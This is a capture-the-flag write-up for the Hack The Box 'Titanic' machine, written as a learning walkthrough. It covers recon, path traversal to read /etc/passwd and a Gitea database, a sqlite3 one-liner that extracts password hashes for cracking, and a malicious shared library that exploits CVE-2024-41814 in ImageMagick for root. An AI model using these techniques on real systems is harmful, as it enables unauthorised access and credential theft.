Titanic - Hack The Box

This machine is part of HTB Season 7 and is categorized as an easy Linux box. It provides a great learning experience by combining web enumeration, credential extraction, and privilege escalation. The challenge revolves around exploring a developer’s environment, uncovering sensitive information, and leveraging vulnerabilities to gain root access. Let’s dive in!

Setup

Before starting the reconnaissance phase, we need to add the target machine’s IP address to the /etc/hosts file:

Recon

We begin by scanning the target machine (10.10.11.55) for open ports using nmap: nmap 10.10.11.55 -sV -sC -p- -oN nmapres

The scan reveals two open ports : 22/tcp 80/tcp`

Enumerating directories with gobuster

We use gobuster to discover directories:

gobuster dir -u titanic.htb -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-words.txt > gobusteres

This reveals three subdirectories : /download (code 400) /book (code 405) /server-status (code 403)

Discovering subdomains with FFUF

ffuf -u http://titanic.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.titanic.htb" -fw 20

The scan reveals a subdomain: dev.titanic.htb. We add it to /etc/hosts and visit the webpage.

Exploring the web application

Now we can access to the web page :

Upon accessing dev.titanic.htb, we find two developer repositories:

docker-config
flask-app

In docker-config/mysql, we discover a docker-compose.yml file containing credentials :

Here we have found the root password, username and user’s password of the database.

We can also checked the flask-app repository where we can find the app.py file :

Here we can found the download route using a GET parameter : ticket.

Exploiting path traversal

Let’s try if we can exploit a potential Path Traversal attack on http://titanic.htb/download?ticket=/etc/passwd

… and it’s worked !

This successfully retrieves the /etc/passwd file, confirming a vulnerability.

Extracting gitea credentials

So now that I know that Path Traversal attack worked, I switched to Burp Suite :

And we can identify the developer user :

Based on Gitea documentation we locate the app.ini file :

Then I cheked the data/gitea/gitea.db file. So first I’ve downloaded it and then I and found hashes passwords :

Let’s check if we can crack any of these…

But first, we need to properly extract each password. To do this, we’ll use the following command suggested by oxdf :

sqlite3 gitea.db "select passwd,salt,name from user" | while read data; do digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $data | cut -d'|' -f 3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hashes

And we successfully crack two hashes :

We can now try to connect via ssh with that password :

From there, we can have access to the user flag :

Privilege escalation

After enumerating a bit the target machine, I found a script identify_images.sh owned by the root user and can be executed by the developer user. We can supposed that this script is executed every x minutes by the root user.

We can see that the script is using magick binary so we can first check the version :

Checking the ImageMagick version reveals it is vulnerable to CVE-2024-41814 : CVE

Exploiting CVE-2024-41814

From the identify_images.sh script, we can see that it first changes the directory to /opt/app/static/assets/images. It searches for all files with a .jpg extension in the directory and its subdirectories using the find command and processes each .jpg file with the magick identify command and appends the output to metadata.log.

So we first need to craft a malicious shared library in the current working directory :

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
    system("cat /root/root.txt > /tmp/pwned");
    exit(0);
}
EOF

And then we create a fake image file from an existing jpg file : cp home.jpg root.jpg

After waiting for identify_images.sh to execute, the root flag appears in /tmp/pwned.

Congratulations! This CTF was a great opportunity to practice essential pentesting techniques, from reconnaissance with nmap, gobuster, and ffuf to web exploitation through a path traversal vulnerability. It also involved credential extraction and cracking using SQLite, followed by privilege escalation through an ImageMagick vulnerability. Each step highlighted the importance of methodical enumeration and creative exploitation.

I hope you found this writeup insightful. Thanks for reading and happy hacking!